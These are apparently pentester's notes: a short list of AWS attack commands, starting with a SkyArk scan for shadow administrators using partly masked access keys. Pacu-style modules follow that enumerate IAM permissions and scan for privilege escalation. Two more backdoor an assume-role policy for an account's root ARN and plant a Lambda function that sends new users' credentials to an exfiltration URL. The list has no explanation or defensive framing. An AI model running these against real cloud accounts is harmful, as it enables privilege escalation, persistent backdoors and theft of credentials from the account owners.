PS C:\SkyArk> Scan -AWShadowAdmins -AccessKeyID AKIA5DWQIQ2MR6OXXXXX -SecretKey BYptvF+QF2kk8W4DJUiu5xQPffr34AFqYptXXXXX -DefaultRegion us-west-2


run iam__enum_permissions


run iam__privesc_scan


run iam__backdoor_assume_role --role-names Soldier --user-arns arn:aws:iam::18xxxx010:root


run lambda__backdoor_new_users --exfil-url <sumoLogic endpoint url>


"Resource": "arn:aws:iam::account-id-no-hyphens:user/${aws:username}"